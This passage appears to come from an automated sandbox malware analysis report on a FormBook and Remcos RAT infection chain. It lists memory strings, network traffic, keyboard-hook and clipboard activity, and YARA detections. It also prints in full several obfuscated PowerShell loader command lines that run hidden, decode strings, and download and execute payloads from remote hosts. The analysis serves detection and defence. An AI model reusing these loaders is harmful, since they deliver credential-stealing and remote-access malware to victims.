              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exeString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperu.com
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperu.com/
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperu.com/Jouse1.png
              Source: wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperu.com/Jouse4.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avocaldoperuone.com/Jouse4.png
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&f
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exeString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041183A OpenClipboard,GetLastError,DeleteFileW,17_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7860.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_8084.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4336
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4360
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4400
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4400
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4336Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4360Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4400Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4400
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004016FD NtdllDefWindowProc_A,18_2_004016FD
